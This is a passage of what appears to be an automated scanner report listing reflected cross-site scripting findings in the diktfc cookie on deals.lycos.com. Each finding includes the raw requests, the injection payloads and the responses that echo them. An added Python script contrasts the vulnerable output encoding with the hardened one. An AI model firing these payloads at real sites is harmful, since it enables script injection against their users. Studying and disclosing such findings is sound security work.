User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6e5a9"%3balert(1)//21691b5acad; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:26 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
javascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-32-720p-lcd-hdtv-for-330-414355",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A6e5a9";alert(1)//21691b5acad"
});
</script>
...[SNIP]...

1.231. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2e5"><script>alert(1)</script>04a9fd962a5 was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:23 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18207

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
p://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A3a2e5"><script>alert(1)</script>04a9fd962a5&amp;cj=1" alt="tracker" />
...[SNIP]...

1.232. http://deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14597"%3balert(1)//71a486517fb was submitted in the diktfc cookie. This input was echoed as 14597";alert(1)//71a486517fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A14597"%3balert(1)//71a486517fb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18181

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ipt">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-55-3d-ready-hdtv-w-3d-kit-2-099-414388",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A14597";alert(1)//71a486517fb"
});
</script>
...[SNIP]...

1.233. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31ce5"><script>alert(1)</script>570dcb9c64e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:28 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 18069

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
tp://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A31ce5"><script>alert(1)</script>570dcb9c64e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.234. http://deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46acf"%3balert(1)//6a7aece2843 was submitted in the diktfc cookie. This input was echoed as 46acf";alert(1)//6a7aece2843 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
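The responses in this report show a partial encoding: in the `<img src>` URL every `&` has become `&amp;`, while `"` and `<` pass through untouched, and in the `COMSCORE.beacon` call the cookie is dropped straight into a `"..."` literal. The script below is an added example, not code from the report or from Lycos: it rebuilds both sinks in Python, side by side with a version that encodes for each context (percent-encode the cookie as a query value, attribute-encode the whole URL, JSON-encode the script literal with `<`, `>` and `&` escaped so a `</script>` inside the value cannot end the block), and checks each output with an HTML parser and a JS-string decoder. It is Python rather than the site's PHP (`X-Powered-By: PHP/5.1.6`) so it runs as-is; the PHP equivalents are `rawurlencode()`, `htmlspecialchars($s, ENT_QUOTES)` and `json_encode($s, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_QUOT)`, noting that `json_encode` arrived in PHP 5.2 and the `JSON_HEX_*` flags in 5.3. The `looks_like_diktfc` format check is an assumption based only on the captured value.

```python
"""The report's two diktfc sinks, rendered the vulnerable way and the fixed way.

Added example, not code from the report or from Lycos. It rebuilds in Python
the two sinks visible in the responses (the scorecardresearch <img src> URL
and the COMSCORE.beacon c15 string literal), shows why encoding only '&' is
not enough, and checks the result with an HTML parser. The site itself runs
PHP (X-Powered-By: PHP/5.1.6); the cookie format check is an assumption.
"""
import html
import json
import re
from html.parser import HTMLParser
from urllib.parse import quote

COOKIE_PREFIX = "013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A"
DEAL = "deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374"
ATTR_PAYLOAD = '31ce5"><script>alert(1)</script>570dcb9c64e'   # finding 1.233
JS_PAYLOAD = '46acf";alert(1)//6a7aece2843'                      # finding 1.234

_URL = "http://b.scorecardresearch.com/p?c1=2&c2=6036445&c3=&c4=%s&c5=&c6=&c15=%s&cj=1"
_SCRIPT = ('<script type="text/javascript">\nCOMSCORE.beacon({\nc1:2,\nc2:6036445,\n'
           'c3:"",\nc4:%s,\nc5:"",\nc6:"",\nc15:%s\n});\n</script>')


def render_vulnerable(diktfc, deal=DEAL):
    """Shape seen in the report: '&' becomes &amp; in the image URL, but '"'
    and '<' pass straight through, and the cookie lands verbatim inside a
    double-quoted JavaScript string literal."""
    img = '<img src="%s" alt="tracker" />' % (_URL % (deal, diktfc)).replace("&", "&amp;")
    return img + "\n" + _SCRIPT % ('"%s"' % deal, '"%s"' % diktfc)


def js_string(value):
    """Serialise a value as a JavaScript string literal for a <script> block.
    json.dumps escapes '"', '\\' and (with ensure_ascii) U+2028/2029; '<', '>'
    and '&' are escaped as well so '</script>' in the value cannot end the block."""
    return (json.dumps(value).replace("<", "\\u003c")
            .replace(">", "\\u003e").replace("&", "\\u0026"))


def render_hardened(diktfc, deal=DEAL):
    """Encode per context: percent-encode the cookie as a query value, then
    attribute-encode the whole URL; JSON-encode the JS string literals."""
    url = _URL % (quote(deal, safe="/"), quote(diktfc, safe=""))
    img = '<img src="%s" alt="tracker" />' % html.escape(url, quote=True)
    return img + "\n" + _SCRIPT % (js_string(deal), js_string(diktfc))


def looks_like_diktfc(value):
    """Allow-list check, assumed format: 44 upper-case hex digits like the
    captured value. Reject before rendering; output encoding is the second layer."""
    return re.fullmatch(r"[0-9A-F]{44}", value) is not None


class _Seen(HTMLParser):
    """Record start tags and the first <img src> the way a browser tokeniser would."""
    def __init__(self):
        super().__init__()
        self.tags, self.img_src = [], None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "img" and self.img_src is None:
            self.img_src = dict(attrs).get("src")


def start_tags(markup):
    """Names of the start tags a parser sees; an injected <script> shows up here."""
    p = _Seen()
    p.feed(markup)
    return p.tags


def img_src(markup):
    """The src attribute of the first <img>, entity-decoded as a browser would."""
    p = _Seen()
    p.feed(markup)
    return p.img_src


_C15 = re.compile(r'c15:("(?:[^"\\]|\\.)*")')


def c15_literal(markup):
    """The c15 string literal as a JS engine reads it; anything after the
    closing quote is live code."""
    return json.loads(_C15.search(markup).group(1))


if __name__ == "__main__":
    for label, render in [("vulnerable", render_vulnerable), ("hardened", render_hardened)]:
        out = render(COOKIE_PREFIX + ATTR_PAYLOAD)
        print(label, start_tags(out), img_src(out)[-60:])
        print(label, "c15 =", c15_literal(render(COOKIE_PREFIX + JS_PAYLOAD)))
```

With the 1.233 payload the vulnerable output yields three start tags (`img`, the injected `script`, the tracker `script`) and an `src` truncated at the canary; the hardened output yields two and an `src` that still carries the whole value, percent-encoded. With the 1.234 payload the vulnerable `c15` literal decodes to the cookie up to the injected quote, with `;alert(1)//...` left outside it as code, while the hardened literal decodes back to the full cookie. Rejecting malformed cookie values up front (`looks_like_diktfc`) is cheaper still and removes the script-context reflection the remediation note warns about, but it does not replace the encoding, since the value's format may change.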

Request

GET /deal/samsung-nx10-15mp-dslr-camera-lens-423-413374 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A46acf"%3balert(1)//6a7aece2843; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:33:29 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:33:30 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17963

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-nx10-15mp-dslr-camera-lens-423-413374",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A46acf";alert(1)//6a7aece2843"
});
</script>
...[SNIP]...

1.235. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-sunburst-a697-cell-phone-50-414188

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4046a"><script>alert(1)</script>6e957a235e was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:57 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A4046a"><script>alert(1)</script>6e957a235e&amp;cj=1" alt="tracker" />
...[SNIP]...

1.236. http://deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/samsung-sunburst-a697-cell-phone-50-414188

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8f2f"%3balert(1)//00ef4809ce3 was submitted in the diktfc cookie. This input was echoed as c8f2f";alert(1)//00ef4809ce3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/samsung-sunburst-a697-cell-phone-50-414188 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8f2f"%3balert(1)//00ef4809ce3; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:58 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:58 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17740

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/samsung-sunburst-a697-cell-phone-50-414188",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9Ac8f2f";alert(1)//00ef4809ce3"
});
</script>
...[SNIP]...

1.237. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20a9f"><script>alert(1)</script>2045b97a5bb was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A20a9f"><script>alert(1)</script>2045b97a5bb; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:23 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:23 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 17219

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
"http://b.scorecardresearch.com/p?c1=2&amp;c2=6036445&amp;c3=&amp;c4=deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377&amp;c5=&amp;c6=&amp;c15=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A20a9f"><script>alert(1)</script>2045b97a5bb&amp;cj=1" alt="tracker" />
...[SNIP]...

1.238. http://deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377

Issue detail

The value of the diktfc cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 84305"%3balert(1)//a3738040bfc was submitted in the diktfc cookie. This input was echoed as 84305";alert(1)//a3738040bfc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: displayMobile=0; lubid=33F14CA0D15DA22424BE0C72C8DC697B68448B35C4AF; diktfc=013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A84305"%3balert(1)//a3738040bfc; __utmz=1.1292163874.1.2.utmcsr=lycoshome|utmccn=home_deals|utmcmd=right_module; __utma=1.1159493979.1292163871.1292163871.1292163871.1; PENTA=174.121.222.18.1292163893857460; __utmc=1; __utmb=1.6.10.1292163871; LycosDeals=urekhuop9o7e7tsuqpcq0rf2l2;

Response

HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 14:32:24 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI"
Set-Cookie: displayMobile=0; expires=Mon, 12-Dec-2011 14:32:24 GMT; path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 16787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Content-
...[SNIP]...
ascript">
COMSCORE.beacon({
c1:2,
c2:6036445,
c3:"",
c4:"deals.lycos.com/deal/sharp-55-120hz-1080p-led-hdtv-1-200-414377",
c5:"",
c6:"",
c15:"013B5372FEFD44A41FE3570F2503F00E6F4BB105AD9A84305";alert(1)//a3738040bfc"
});
</script>
...[SNIP]...

1.239. http://deals.lycos.com/deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 [diktfc cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://deals.lycos.com
Path:   /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299

Issue detail

The value of the diktfc cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8753a"><script>alert(1)</script>f676558b74c was submitted in the diktfc cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /deal/sharp-aquos-40-120hz-lcd-hdtv-blu-ray-699-414299 HTTP/1.1
Host: deals.lycos.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
